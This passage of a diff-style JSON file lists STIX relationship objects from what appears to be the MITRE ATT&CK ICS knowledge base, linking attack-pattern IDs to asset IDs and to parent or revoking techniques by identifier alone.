"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--37ab816f-179f-4f12-a2d7-ddeac3c43eb3", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--37aeaf27-6bbe-4949-ba77-37649e38f8b2", + "created": "2023-09-29T16:31:46.749Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:31:46.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--37bdc371-46d2-4f94-996d-cf1532c2ccc0", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--37cf02f7-b313-4dde-a52e-e68d519b02de", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--37d44c5f-d217-47af-9b1c-6ba671448e99", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3819b66b-51e4-440d-93cf-12e8b6892e3e", + "created": "2020-03-02T19:15:44.284Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3843dcca-62a2-4224-9241-05f981fa880a", + "created": "2023-09-28T19:46:23.921Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:46:23.921Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--384ee32c-610e-4521-b0ff-d2ea5f2b3fb3", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3853e248-e785-4b55-b3fa-8b77e51ab80e", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3858e3d8-26a9-42eb-87d3-768d7d48793c", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3862e7f0-f00d-486f-9ca3-8b2947e19aab", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--386a591e-3e8e-4f23-8a5c-60abfa831d30", + "created": "2020-02-21T16:22:09.780Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3871b3d6-9b62-4f20-af9f-8317b263b5a8", + "created": "2020-02-12T18:55:55.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d", + "target_ref": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3892c5bb-3e54-4831-b113-d98dd5ecb37b", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38a73f72-aaad-438d-a4a1-318004fae666", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38ae2a97-1756-4452-b542-33d00b891742", + "created": "2024-01-02T13:43:37.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-01-02T13:43:37.736Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38b2962e-fa77-4037-9531-7802c52e66a9", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38b33f88-bc7e-4376-891d-51e7a0404174", + "created": "2020-03-19T15:09:22.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--46944654-fcc1-4f63-9dad-628102376586", + "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38b8ef7b-ed9b-40b4-820a-be7c8b22a1b0", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38bda770-c470-4358-a9ad-a5b39bec026b", + "created": "2023-09-29T16:28:28.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:28:28.550Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38c139e3-9174-4fc4-a638-3473b257d593", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38c26d19-6275-4ca2-919f-cb5976c1b19c", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38c7e0b8-3961-48ed-b5e6-c4763c212ecb", + "created": "2020-03-15T00:30:25.597Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--38fd8b52-2487-48d2-816e-b526ad192806", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39084aef-6ba7-4370-832f-b10002b97804", + "created": "2020-01-24T14:07:56.483Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--391335b3-9514-4eca-b71f-88cebf93d7ac", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39221b72-9f98-4434-9de6-139c154b8705", + "created": "2020-01-24T19:47:55.649Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--1f47e2fd-fa77-4f2f-88ee-e85df308f125", + "target_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--393edc4d-ff5e-447a-bf27-27c4679dd47f", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39452123-574f-4f3a-95ec-a90170a3d7eb", + "created": "2023-10-02T20:20:44.850Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:20:44.850Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--395025ba-fcf0-49b6-a6b0-d06d0d14eb51", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39591730-3696-49f1-b350-7b7362c7e52a", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--395ef401-46f3-440a-b5c2-bef6e2778b91", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--399126a9-815d-4c3b-9d5e-f57d698ac742", + "created": "2023-09-28T19:40:36.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:40:36.023Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--399ea1bb-9c7e-4e5a-9725-4edecd20621a", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39b5e46a-9b13-45bc-b4c3-411bff0aeb77", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39ca984c-dd4e-47f9-b762-69ca8a47d151", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39cc150a-6e52-48d3-8008-23637fafd5eb", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--39dc7fb7-0b62-466e-ac6c-27766bb92fbc", + "created": "2024-05-23T04:19:41.699Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:17:47.359Z", + "description": "Asset Mapping Rationale: Adversaries may delete or remove 